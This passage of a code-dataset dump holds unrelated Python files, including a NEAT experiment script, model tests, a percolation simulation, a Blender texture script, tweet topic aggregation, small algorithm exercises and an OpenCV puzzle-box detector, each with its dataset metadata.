neat.stagnation.DefaultStagnation,\n 'config_cppn')\n\n winner = run(int(sys.argv[2]) if len(sys.argv)>2 else 50)[0]\n print('\\nBest genome:\\n{!s}'.format(winner))\n\n # Verify network output against training data.\n print('\\nOutput:')\n cppn = neat.nn.FeedForwardNetwork.create(winner, config)\n network = ESNetwork(sub, cppn, params)\n winner_net = network.create_phenotype_network(filename=experiment_name+'/es_hyperneat_xor_medium_winner.png') # This will also draw winner_net.\n with open(experiment_name+'/winner_genome.pkl','wb')as f:\n\n pickle.dump(winner,f)\n f.close()\n with open(experiment_name+'/my_winner_genome_'+str(int(max_f))+'.pkl','wb')as f:\n\n pickle.dump(max_g,f)\n f.close()\n # Save CPPN if wished reused and draw it to file.\n draw_net(cppn, 
filename=experiment_name+\"/es_hyperneat_xor_medium_cppn\")\n with open(experiment_name+'/es_hyperneat_xor_medium_cppn.pkl', 'wb') as output:\n pickle.dump(cppn, output, pickle.HIGHEST_PROTOCOL)\n\n","sub_path":"specialist_hyperneat_multirun.py","file_name":"specialist_hyperneat_multirun.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"616542116","text":"from datetime import date\nfrom pytest import fixture\nfrom .models import User, Trip\n\n\n@fixture\ndef user() -> User:\n return User(username=\"Dummy\", email=\"dummy@dummy.dm\", password=\"password\")\n\n\ndef test_user_create(user: User):\n assert user\n\n\n@fixture\ndef trip() -> Trip:\n test_date = date.fromisoformat(\"2021-03-30\")\n return Trip(\n user_id=1,\n departure=\"Angers\",\n departure_id=\"admin:fr:49007\",\n arrival=\"Toulouse\",\n arrival_id=\"admin:fr:31555\",\n date=test_date,\n )\n\n\ndef test_trip_create(trip: Trip):\n assert trip\n","sub_path":"app/application/models_test.py","file_name":"models_test.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"222428443","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom algorithm import WeightedQuickUnionUF\nfrom random import Random\nfrom time import time\nimport sys\nfrom pdf import crearPDF\nfrom mail import envio_mail\n\n\nclass PercolationSimulation(object):\n\n def __init__(self, N, rseed=None):\n self.N = N\n # La grilla es de N * N, pero se agregan dos componentes virtuales\n self.qu = WeightedQuickUnionUF(N * N + 2, debug=False)\n self.virt_top = N * N\n self.virt_bottom = N * N + 1\n\n # Usamos un hack: hay dos nodos virtuales en WQU, una para cada borde\n # Conectamos todos los nodos de cada borde a su nodo virtual, luego checkeamos si ambos nodos son conexos\n # Si esto es True, el sistema percola\n for i in range(N):\n self.qu.union(N * N, i) # El nodo N * N es virtual top\n for i in range(N * N - N, N * N):\n self.qu.union(N * N + 1, i) # El nodo N * N + 1 es virtual bottom\n\n self.open = [False] * (N * N) # Indica si el nodo esta abierto o no\n self.rng = Random(rseed) if rseed else Random()\n\n def adyacentes(self, p):\n # Retorna los id de los nodos abiertos adyacentes a p\n adyacentes = []\n izq = p - 1\n derecha = p + 1\n arriba = p - self.N\n abajo = p + self.N\n\n # Checkea a los vecinos del nodo, viendo si realmente son vecinos, y\n # estan abiertos\n for nodo in (izq, derecha, arriba, abajo):\n if 0 < nodo < self.N * self.N and self.open[nodo]:\n adyacentes.append(nodo)\n return adyacentes\n\n def _percola(self): # Si ambos nodos virtuales son conexos, bingo!\n return self.qu.connected(self.virt_top, self.virt_bottom)\n\n def umbral(self):\n cerrados = range(self.N * self.N) # Todos los sitios parten cerrados\n # Hacemos un shuffle, para ir abriendo sitios aleatoriamente\n self.rng.shuffle(cerrados)\n\n while cerrados:\n nodo = cerrados.pop()\n self.open[nodo] = True # Se abre el nodo\n vecinos = self.adyacentes(nodo) # Se obtienen los nodos adyacentes\n\n # Se establece un enlace entre el nodo y cada nodo adyacente\n for vecino in vecinos:\n self.qu.union(nodo, vecino)\n\n if self._percola():\n break # Si el sistema percola, terminamos\n abiertos = float(self.N ** 2 - len(cerrados))\n\n # La estimación del umbral de percolación\n return abiertos / (self.N * self.N)\n\n\nif __name__ == '__main__':\n ST = time()\n enfe = int(sys.argv[1])\n cont 
= 0\n dist = int(sys.argv[2])\n N = int(sys.argv[3])\n mail = str(sys.argv[4])\n nombre = str(sys.argv[5])\n SAMPLE_SIZE = 385\n estimated_threshold = []\n mean = 0.0\n variance = 0.0\n if enfe == 1: # quillay\n cont = 39\n if enfe == 2: # peumo\n cont = 35\n if enfe == 3: # boldo\n cont = 32\n if enfe == 4: # roble\n cont = 10\n if enfe == 5: # rauli\n cont = 20\n pass\n for i in range(SAMPLE_SIZE):\n percolacion = PercolationSimulation(N)\n estimado = percolacion.umbral()\n mean += estimado\n estimated_threshold.append(estimado)\n mean /= SAMPLE_SIZE\n for x in estimated_threshold:\n variance += (x - mean) ** 2\n variance /= (SAMPLE_SIZE - 1)\n mean = (mean * cont) / 100\n mean = 1 - mean\n T = (time() - ST)\n crearPDF(enfe, dist, N, mean, T, nombre)\n envio_mail(mail, nombre)\n","sub_path":"Programa/Percolacion/enfer/sec.py","file_name":"sec.py","file_ext":"py","file_size_in_byte":3512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"227962205","text":"server_roles = (\n ('LINMN01', 'OA Management Node on Linux.'),\n ('BALINBE', 'BA Database Server on Linux.'),\n ('BALINFE', 'BA Application Server on Linux.'),\n ) \n\noperating_systems = (\n ('WIN60', 'Windows Server 2008'),\n ('WIN61', 'Windows Server 2008 R2'),\n ('WIN62', 'Windows Server 2012'),\n ('WIN63', 'Windows Server 2012 R2'),\n ('CENTOS5', 'CentOS 5'),\n ('CENTOS6', 'CentOS 6'),\n ('CENTOS7', 'CentOS 7'),\n ('CLIN5', 'Cloud Linux 5'),\n ('CLIN6', 'Cloud Linux 6'),\n )\n\narchitecture = (\n ('x86', '32 bits architecture'),\n ('x86_64', '64 bits architecture'),\n )","sub_path":"servers/choices.py","file_name":"choices.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"436760701","text":"# -*- coding=utf -*-\nfrom .common import decamelize, to_identifier, coalesce_options\nfrom collections import defaultdict\n\n_default_modules = {\n \"stores\": {\n \"sql\":\"cubes.backends.sql.store\",\n \"mongo\":\"cubes.backends.mongo\",\n \"mongo2\":\"cubes.backends.mongo2\",\n \"mixpanel\":\"cubes.backends.mixpanel.store\",\n \"slicer\":\"cubes.backends.slicer.store\",\n },\n \"browsers\": {\n \"snowflake\":\"cubes.backends.sql.browser\",\n \"snapshot\": \"cubes.backends.sql.browser\",\n \"mixpanel\":\"cubes.backends.mixpanel.browser\",\n \"slicer\":\"cubes.backends.slicer.browser\",\n },\n \"model_providers\": {\n \"mixpanel\":\"cubes.backends.mixpanel.store\",\n \"slicer\":\"cubes.backends.slicer.store\",\n },\n \"request_log_handlers\": {\n \"sql\":\"cubes.backends.sql.logging\",\n },\n \"authorizers\": {\n }\n}\n\nclass Namespace(dict):\n def __init__(self, name, objects=None, root_class=None, suffix=None,\n option_checking=False):\n self.name = name\n self.root_class = root_class\n self.suffix = suffix\n self.option_checking = option_checking\n\n if objects:\n self.update(objects)\n\n def discover_objects(self):\n if self.root_class:\n objects = collect_subclasses(self.root_class, self.suffix)\n\n if self.option_checking:\n # Convert classes to factories\n for name, class_ in objects.items():\n objects[name] = _FactoryOptionChecker(class_)\n\n self.update(objects)\n\n def __getattr__(self, value):\n return self.__getitem__(value)\n\n def __getitem__(self, value):\n try:\n return super(Namespace, self).__getitem__(value)\n except KeyError:\n # Lazily load module that might contain the object\n modules = _default_modules.get(self.name)\n if modules and value in modules:\n 
_load_module(modules[value])\n self.discover_objects()\n\n # Retry after loading\n return super(Namespace, self).__getitem__(value)\n\nclass _FactoryOptionChecker(object):\n def __init__(self, class_, options=None):\n \"\"\"Creates a factory wrapper for `class_`. Calling the object createds\n an instance of `class_` and configures it according to `options`. If\n not options are specified, then the class variable `__options__` is used.\n\n The options is a list of dictionaries with keys:\n\n * `name` – option name\n * `type` – option data type\n * `description` – description (optional)\n * `label` – human readable label (optional)\n * `values` – valid values for the option.\"\"\"\n\n if not options and hasattr(class_, \"__options__\"):\n options = class_.__options__\n\n self.options = {}\n self.option_types = {}\n for option in options or []:\n name = option[\"name\"]\n self.options[name] = option\n self.option_types[name] = option.get(\"type\", \"string\")\n\n self.class_ = class_\n\n def __call__(self, *args, **kwargs):\n # TODO: move this to a metaclass\n options = dict(kwargs)\n options = coalesce_options(dict(kwargs), self.option_types)\n\n return self.class_(*args, **options)\n\n_namespaces = {}\n\ndef get_namespace(name):\n \"\"\"Gets a namespace `name` dictionary.\"\"\"\n\n return _namespaces.get(name)\n\ndef initialize_namespace(name, objects=None, root_class=None, suffix=None,\n option_checking=False):\n \"\"\"Initializes the namespace `name` with `objects` dictionary and\n subclasses of `root_class` where the class name is decamelized, changet do\n an identifier and with `suffix` removed.\"\"\"\n\n ns = Namespace(name, objects, root_class, suffix,\n option_checking=option_checking)\n ns.discover_objects()\n _namespaces[name] = ns\n\n return ns\n\ndef collect_subclasses(parent, suffix=None):\n \"\"\"Collect all subclasses of `parent` and return a dictionary where keys\n are object names. Obect name is decamelized class names transformed to\n identifiers and with `suffix` removed. 
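A minimal usage sketch, assuming a hypothetical parent class `Browser` and that `decamelize` maps `SnowflakeBrowser` to `snowflake_browser`:\n\n        collect_subclasses(Browser, suffix='_browser')\n        # returns {'snowflake': SnowflakeBrowser, ...}\n\n    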
If a class has class attribute\n `__identifier__` then the attribute is used as name.\"\"\"\n\n subclasses = {}\n for c in subclass_iterator(parent):\n if hasattr(c, \"__identifier__\"):\n name = getattr(c, \"__identifier__\")\n else:\n name = to_identifier(decamelize(c.__name__))\n\n if suffix and name.endswith(suffix):\n name = name[:-len(suffix)]\n subclasses[name] = c\n\n return subclasses\n\ndef subclass_iterator(cls, _seen=None):\n \"\"\"\n Generator over all subclasses of a given class, in depth first order.\n\n Source: http://code.activestate.com/recipes/576949-find-all-subclasses-of-a-given-class/\n \"\"\"\n\n if not isinstance(cls, type):\n raise TypeError('_subclass_iterator must be called with '\n 'new-style classes, not %.100r' % cls)\n\n _seen = _seen or set()\n\n try:\n subs = cls.__subclasses__()\n except TypeError: # fails only when cls is type\n subs = cls.__subclasses__(cls)\n for sub in subs:\n if sub not in _seen:\n _seen.add(sub)\n yield sub\n for sub in subclass_iterator(sub, _seen):\n yield sub\n\ndef _load_module(modulepath):\n mod = __import__(modulepath)\n path = []\n for token in modulepath.split(\".\")[1:]:\n path.append(token)\n mod = getattr(mod, token)\n return mod\n","sub_path":"cubes/extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"627772817","text":"# Copyright (C) 2011 by Ondrej Martinak \n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nimport markup\nfrom project import Project\n\nclass Renderer:\n\n\tdef __init__(self, _title, _css):\n\t\tself.title = _title\n\t\tself.css = _css\n\n\t\tself.page = markup.page()\n\n\t\tself.projects = []\n\n\t\tproj = Project(self.page, \"daffodil\")\n\t\tproj.setDescription(\"This little app will proceduraly generate a city. Future improvements should feature some interesting rendering techniques.\")\n\t\tproj.setDate(\"2011\")\n\t\tproj.setTech(\"python, Panda3D\")\n\t\tproj.setStatus(\"in progress\")\n\t\tproj.setSources({\"git\": \"https://github.com/omartinak/daffodil\"})\n\t\tself.projects.append(proj)\n\n\t\tproj = Project(self.page, \"pgpPainter\")\n\t\tproj.setDescription(\"This project presents a technique that renders a 3D object so it looks like a sketch. This sketch tries to emulate the sketch a human painter would draw, which means it has pronounced contours and a lighter shading is used along the contours rather than natural lighting. 
The technique works pretty well for static scenes but it is not very usable for the moving ones.\")\n\t\tproj.setDate(\"2009\")\n\t\tproj.setTech(\"C++, OpenSceneGraph, GLSL\")\n\t\tproj.setStatus(\"finished\")\n\t\tproj.setSources({\"zip\": \"pgpPainter_src.zip\"})\n\t\tproj.setExecutable({\"elf64\": \"pgpPainter_bin.zip\"})\n\t\tself.projects.append(proj)\n\n\t\tproj = Project(self.page, \"evo3D\")\n\t\tproj.setDescription(\"This application uses evolution algorithm to create spatial objects constructed from simple elements. User can control the evolution by evaluating the quality of certain candidates from the population while he can watch the population evolve in front of him. The evolved parameters are the object's growth and its change in color.\")\n\t\tproj.setDate(\"2009\")\n\t\tproj.setTech(\"java, Qt, OpenGL, genetic algorithms\")\n\t\tproj.setStatus(\"finished\")\n\t\tproj.setSources({\"zip\": \"evo3D_src.zip\"})\n\t\tproj.setExecutable({\"jar\": \"evo3D_bin.zip\"})\n\t\tself.projects.append(proj)\n\n\t\tproj = Project(self.page, \"g-wars\")\n\t\tproj.setDescription(\"g-wars was supposed to be another clone of a well known geometry wars game. It features a simple vector graphics that is post processed with a Cg shader to make it look a little bit fuzzy. It also features a 2D physics engine to make the objects' behaviour more realistic. The game was written with client-server architecture in mind but it was never finished.\")\n\t\tproj.setDate(\"2008\")\n\t\tproj.setTech(\"C++, SDL, OpenGL, nvidia Cg, Box2D\")\n\t\tproj.setStatus(\"unfinished\")\n\t\tproj.setSources({\"zip\": \"g-wars_src.zip\"})\n\t\tproj.setExecutable({\"elf64\": \"g-wars_bin.zip\"})\n\t\tself.projects.append(proj)\n\n\t\tproj = Project(self.page, \"Bankshot\")\n\t\tproj.setDescription(\"My first finished game as an amateur game developer working for SleepTeam Labs. I wrote the code, they supplied the rest. It is a pong variation with four players, either human or computer. Players are losing score whenever they don't catch the ball. To make the game more interesting players can shoot down various bonuses hanging in the center.\")\n\t\tproj.setDate(\"2004\")\n\t\tproj.setTech(\"C++, DirectX\")\n\t\tproj.setStatus(\"finished\")\n\t\tproj.setExecutable({\"link\": \"http://www.iwannaplay.com/?GameID=18\"})\n\t\tself.projects.append(proj)\n\n\t\tproj = Project(self.page, \"Ragnarok\")\n\t\tproj.setDescription(\"A would be clone of Baldur's Gate II with a flavour of Fallout :) with custom rules created by my friend. Although it was never finished it contains functional combat, inventory, character development and a fog of war. Conversation and trading systems were under development. 
I have also created a set of tools for preparing maps, creating inventory items and to help with animating sprites.\")\n\t\tproj.setDate(\"2002\")\n\t\tproj.setTech(\"C++, DirectX\")\n\t\tproj.setStatus(\"unfinished\")\n\t\tproj.setSources({\"zip\": \"ragnarok_src.zip\"})\n\t\tproj.setExecutable({\"win32\": \"ragnarok_bin.zip\"})\n\t\tself.projects.append(proj)\n\n\tdef header(self, text):\n\t\tself.page.div(class_ = 'header')\n\n\t\tself.page.h1(text, style = 'display: inline')\n\n\t\tself.page.span(class_ = 'small')\n\t\tself.page.a('me@bubaak.co.cc', href = \"mailto:me%40bubaak.co.cc\", class_ = 'contact')\n\t\tself.page.span.close()\n\n\t\tself.page.div.close()\n\n\tdef body(self):\n\t\tfor proj in self.projects:\n\t\t\tproj.render()\n\n\tdef render(self):\n\t\tself.page.add('')\n\t\tself.page.html(xmlns = \"http://www.w3.org/1999/xhtml\", lang = \"en\")\n\t\tself.page.head()\n\t\tself.page.meta(http_equiv = \"Content-Type\", content=\"text/html; charset=utf-8\")\n\t\tself.page.css(self.css)\n\t\tself.page.title(self.title)\n\t\tself.page.head.close()\n\t\tself.page.body()\n\n\t\tself.page.div(class_ = 'mainContent')\n\n\t\tself.header(\"Ondrej Martinak's web\")\n\t\tself.body()\n\n\t\tself.page.div(class_ = 'glider')\n\t\tself.page.a(class_ = 'anchorImg', href = \"http://www.catb.org/hacker-emblem/\")\n\t\tself.page.img(style = 'border: none', src = \"data/img/glider.png\", alt = \"hacker emblem\")\n\t\tself.page.a.close()\n\t\tself.page.div.close()\n\n\t\tself.page.div.close()\n\n\t\tself.page.body.close()\n\t\tself.page.html.close()\n\n\t\tprint(self.page)\n\n","sub_path":"generator/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":6125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"411819885","text":"import bpy\nimport os\n\n\ndef ls(cdir): # return directory contents of cdir\n ls = os.listdir(cdir)\n return ls\n\n\nsc = bpy.data.scenes[0] # get current scene\nimgdir = \"C:\\\\images\"\nimg_ext = 'jpg'\n\nfiles = [] # list for files\nimages = [] # list for imgage files\nfiles = (ls(imgdir)) # read file list into list\nfile_count = len(files) # file count\n\nfor a in range(0, file_count): # for each file:\n if files[a].endswith(img_ext): # does it end with?\n images.append(files[a]) # if so then add to images list\n\nimage_count = len(images) # count of images\nprint(file_count)\nprint(image_count)\n\nfor a in range(0, image_count): # for each image\n print(\"========================\")\n print('loop count: ' + str(a))\n bpy.ops.mesh.primitive_plane_add()\n plane = bpy.context.scene.objects.active\n\n mat = bpy.data.materials.new('mat' + str(a))\n bpy.context.object.data.materials.append(mat)\n\n tex = bpy.data.textures.new('ColorTex', type='IMAGE')\n imgpath = imgdir + '\\\\' + images[a] # make string with path ti image\n img = bpy.data.images.load(imgpath) # load image\n tex.image = img\n mtex = mat.texture_slots.add()\n mtex.texture = tex\n\n imgX = img.size[0] / 1000.0 # calculate dimensions\n imgY = img.size[1] / 1000.0\n\n plane.scale[0] = (imgX) # set x plane dimensions to match image\n plane.scale[1] = (imgY) # set y plane dimensions to match image\n","sub_path":"learning data/uv_maker.py","file_name":"uv_maker.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"279218906","text":"n = int(input(\"Type a number between 1 and 100 inclusive: \"))\nif 1 <= n <= 100:\n print(\"Well done!\" + \" The 
number \" + str(n) + \" satisfies the condition.\")\nelse:\n while (1 <= n <= 100) != True:\n print(\"Error!\")\n n = int(input(\"Type a number between 1 and 100: \"))\n else:\n print (\"Thank goodness! I was running out of memory here!\")\n \n \n","sub_path":"Practise/num.py","file_name":"num.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"156869556","text":"\n# coding: utf-8\n\n# In[38]:\n\n\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport nltk\n\nfrom datetime import datetime\n\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import SnowballStemmer\n\n# sklearn\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.decomposition import NMF\n\n\n# In[39]:\n\n\ndef custom_tokenizer(text):\n full_punc = '’‘“”.–…�🇺🇸★➠' + string.punctuation\n # remove punctuation\n remove_punct = str.maketrans('', '', full_punc)\n text = text.translate(remove_punct)\n\n # remove digits and convert to lower case\n remove_digits = str.maketrans('', '', string.digits)\n text = text.lower().translate(remove_digits)\n\n # tokenize\n tokens = word_tokenize(text)\n\n # remove stop words\n punc = [str(i) for i in string.punctuation]\n cust_stop_words = (['rt', 'retweet', 'get', 'one', 'im', 'thing', 'get', 'dont', 'wow',\n 'lol', 'amp', 'n', 'didnt', 'people', 'like', 'want', 'know', 'go',\n 'think', 'need', 'right', 'good', 'would', 'going', 'never', 'see',\n 'time', 'call', 'said', 'got', 'us', 'p', 'look', 'mr'])\n stop_words = cust_stop_words + stopwords.words('english')\n tokens_stop = [y for y in tokens if y not in stop_words]\n\n # stem\n# stemmer = SnowballStemmer('english')\n# tokens_stem = [stemmer.stem(y) for y in tokens_stop] \n\n return tokens_stop\n\n\n# In[40]:\n\n\nwith open(\"rtrolls_df.pkl\", 'rb') as picklefile:\n df_rtrolls = pickle.load(picklefile) \n \nimport json\nwith open('topics2words.json', 'r') as fp:\n topic_dict = json.load(fp)\n\n\n# In[41]:\n\n\ndf_rtrolls.head()\n\n\n# In[42]:\n\n\n#group by week\ntemp_df = df_rtrolls.groupby([\"week\", \"topicnumber\"]).count().reset_index()\n# temp_df\n\ntopic_weeks_df = temp_df[['week', 'topicnumber', 'content']]\n# topic_weeks_df\n\n\n# In[43]:\n\n\ntemp_df = topic_weeks_df[((topic_weeks_df['topicnumber'] == 0) |\n (topic_weeks_df['topicnumber'] == 15) |\n (topic_weeks_df['topicnumber'] == 2) | \n (topic_weeks_df['topicnumber'] == 4) |\n (topic_weeks_df['topicnumber'] == 19) |\n (topic_weeks_df['topicnumber'] == 11) | \n (topic_weeks_df['topicnumber'] == 16) | \n (topic_weeks_df['topicnumber'] == 7) |\n (topic_weeks_df['topicnumber'] == 5) | \n (topic_weeks_df['topicnumber'] == 13))]\n\n\n# In[44]:\n\n\ndata_fillna = temp_df.pivot_table('content', 'week', 'topicnumber').fillna(0).unstack().reset_index()\n\n\n# In[45]:\n\n\ndata_fillna.head()\n\n\n# In[46]:\n\n\n#we lose the count label column in the previous steps, so we're just renaming it here, and reordering columns based on \n#how they are arranged in the viz csv\ndata_fillna.columns = [\"topicnumber\", \"week\", \"content\"]\ndata_fillna = data_fillna[[\"week\", \"topicnumber\", \"content\"]]\ndata_fillna.head()\n\n\n# In[47]:\n\n\ndata_fillna.sort_values('week', inplace=True)\n\n\n# In[48]:\n\n\n#backup file\ndata_fillna.to_csv(\"topicsbyweek.csv\", index = False)\n\n","sub_path":"nlp_russian_tweets/AWS 
Code/topic_dates.py","file_name":"topic_dates.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"498218633","text":"from collections import Counter\nclass Solution:\n def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:\n counter_1 = Counter(nums1)\n counter_2 = Counter(nums2)\n \n intersection = []\n for element in counter_1:\n if element in counter_2:\n intersection+=[element]*min(counter_1[element],counter_2[element])\n \n return intersection\n","sub_path":"programcreek/top-10-algorithms/intersection-of-two-arrays-ii.py","file_name":"intersection-of-two-arrays-ii.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"62577042","text":"import sys\nimport kNN\nfrom pylab import *\nfrom numpy import *\nimport numpy as np\nimport matplotlib\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nmat,lab = kNN.file2matrix('datingTestSet2.txt')\nnormMat, ranges, minVals = kNN.autoNorm(mat)\n\ndef randrange(n, vmin, vmax):\n return (vmax - vmin)*np.random.rand(n) + vmin\n\nfig = plt.figure()\nax = fig.add_subplot(111,projection='3d')\n#ax.scatter(normMat[:,0], normMat[:,1], normMat[:,2], 'o', 'c')\nn = 1\nfor c, m, zl, zh in [('r', 'o', -50, -25), ('b', '^', -30, -5)]:\n xs = randrange(n, 23, 32)\n ys = randrange(n, 0, 100)\n zs = randrange(n, zl, zh)\n\nClassSet=lab\ncolorSet = []\nfor label in ClassSet:\n\tif label is '1':\n\t\tcolorSet.append('r')\n\telif label is '2':\n\t\tcolorSet.append('b')\n\telif label is '3':\n\t\tcolorSet.append('y')\n\telse:\n\t\tcolorSet.append('r')\nprint(colorSet)\n\nx=normMat[:,0]\ny=normMat[:,1]\nz=normMat[:,2]\ni=0\nfor lx in x:\n\tly = y[i]\n\tlz = z[i]\n\tlc = colorSet[i]\n\ti=i+1\n\tprint(lx,ly,lz,lc)\n\tax.scatter(lx, ly, lz, c=lc, marker='o')\n#ax.scatter(normMat[:,0], normMat[:,1], normMat[:,2], colorSet, marker='o')\n\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Z')\nplt.show()\n","sub_path":"machinelearninginaction/Ch02/tu3.py","file_name":"tu3.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"85151917","text":"l=['ee','ii','oo','aa','uu','yy']\r\nn=int(input())\r\ndef co(h):\r\n cc=0\r\n for i in l:\r\n cc+=h.count(i)\r\n return cc\r\nd={}\r\nwhile(n!=0):\r\n for i in range(n):\r\n b=input()\r\n d[b]=co(b)\r\n kk=list(d.values())\r\n ll=list(d.keys())\r\n print(ll[kk.index(max(kk))])\r\n d={}\r\n n=int(input())\r\n","sub_path":"beekeeper.py","file_name":"beekeeper.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"539470332","text":"class Solution:\n def isPalindrome(self, x: int) -> bool:\n x1 = str(x)\n x2 = \"\"\n for i in range(len(x1)-1,-1,-1):\n x2 = x2+x1[i]\n if x1 == x2:\n return True\n return False\n ","sub_path":"LeetCode/9.Palindrome-Number.py","file_name":"9.Palindrome-Number.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"619883470","text":"from cv2 import (matchTemplate, cvtColor, Canny, minMaxLoc, TM_CCORR_NORMED, COLOR_BGR2GRAY, resize, imshow, waitKey)\nfrom numpy import (linspace, median)\nfrom threading import Thread\nimport npuzzlesolver as npuzzle\nimport templates\nimport main as puzzle\n\n\nclass 
PuzzleBox:\n def __init__(self, runescapeimage):\n self.PUZZLE_DIM = {'width': 210, 'height': 208} # Default dimensions of the Runescape puzzle box\n self.runescapeimage = runescapeimage\n (self.puzzleimage, self.puzzlerect) = (None, None)\n th = Thread(target=self.findpuzzlebox)\n th.daemon = True\n th.start()\n self.scalex = None\n self.scaley = None\n\n def setscales(self):\n self.scalex = self.puzzlerect['width'] / self.PUZZLE_DIM['width']\n self.scaley = self.puzzlerect['height'] / self.PUZZLE_DIM['height'] # Scaled dimensions\n\n def findpuzzlebox(self):\n found = self.findedgetemplate(self.runescapeimage, templates.PUZZLE_BOX_TEMPLATE)\n (_, unscaledlocation, scale) = found\n (puzzle_posx, puzzle_posy) = ((unscaledlocation[0] * scale), (unscaledlocation[1] * scale))\n (puzzle_endx, puzzle_endy) = (((unscaledlocation[0] + self.PUZZLE_DIM['width']) * scale),\n ((unscaledlocation[1] + self.PUZZLE_DIM['height']) * scale)) # Scaled position\n\n rect = {'posx': puzzle_posx, 'posy': puzzle_posy,\n 'width': puzzle_endx - puzzle_posx, 'height': puzzle_endy - puzzle_posy}\n maskedimage = self.maskimage(self.runescapeimage, rect) # black out part of screenshot we don't need\n self.puzzleimage = maskedimage\n self.puzzlerect = rect\n self.setscales()\n puzzle.PuzzleThread.puzzlebox_ready = True\n\n def findedgetemplate(self, image, template):\n found = None\n gray = cvtColor(image, COLOR_BGR2GRAY)\n template = self.auto_canny(template)\n (template_height, template_width) = template.shape[:2]\n # loop over the scales of the image\n for scale in linspace(0.2, 1.0, 100)[::-1]:\n # resize the image according to the scale, and keep track\n # of the ratio of the resizing\n resized = resize(gray, (0, 0), fx=scale, fy=scale)\n r = gray.shape[1] / float(resized.shape[1])\n\n # if the resized image is smaller than the template, then break\n # from the loop\n if resized.shape[0] < template_height or resized.shape[1] < template_width:\n break\n edged = self.auto_canny(resized)\n result = matchTemplate(edged, template, TM_CCORR_NORMED)\n (_, maxval, _, maxloc) = minMaxLoc(result)\n\n # if we have found a new maximum correlation value, then update\n # the bookkeeping variable\n if found is None or maxval > found[0]:\n found = (maxval, maxloc, r)\n if maxval > 0.6:\n break\n\n return found\n\n @staticmethod\n def maskimage(unmasked, puzzlerect):\n mask = unmasked[puzzlerect['posy']:puzzlerect['posy'] + puzzlerect['height'],\n puzzlerect['posx']:puzzlerect['posx'] + puzzlerect['width']]\n return mask\n\n @staticmethod\n def auto_canny(image, sigma=0.33):\n # compute the median of the single channel pixel intensities\n v = median(image)\n\n # apply automatic Canny edge detection using the computed median\n lower = int(max(0, (1.0 - sigma) * v))\n upper = int(min(255, (1.0 + sigma) * v))\n edged = Canny(image, lower, upper)\n\n # return the edged image\n return edged\n\n\nclass PuzzleTiles:\n def __init__(self, puzzlebox):\n self.TILE_ATTRS = {'FIRST_POSX': 16, 'FIRST_POSY': 14, 'TILE_WIDTH': 29, 'TILE_HEIGHT': 29,\n 'TILE_GAP': 8} # Default positional values of tiles\n self.first_posx_scaled = self.TILE_ATTRS['FIRST_POSX'] * puzzlebox.scalex\n self.first_posy_scaled = self.TILE_ATTRS['FIRST_POSY'] * puzzlebox.scaley\n self.tile_width_scaled = self.TILE_ATTRS['TILE_WIDTH'] * puzzlebox.scalex\n self.tile_height_scaled = self.TILE_ATTRS['TILE_HEIGHT'] * puzzlebox.scaley\n self.tile_gaphorz_scaled = self.TILE_ATTRS['TILE_GAP'] * puzzlebox.scalex\n self.tile_gapvert_scaled = self.TILE_ATTRS['TILE_GAP'] * 
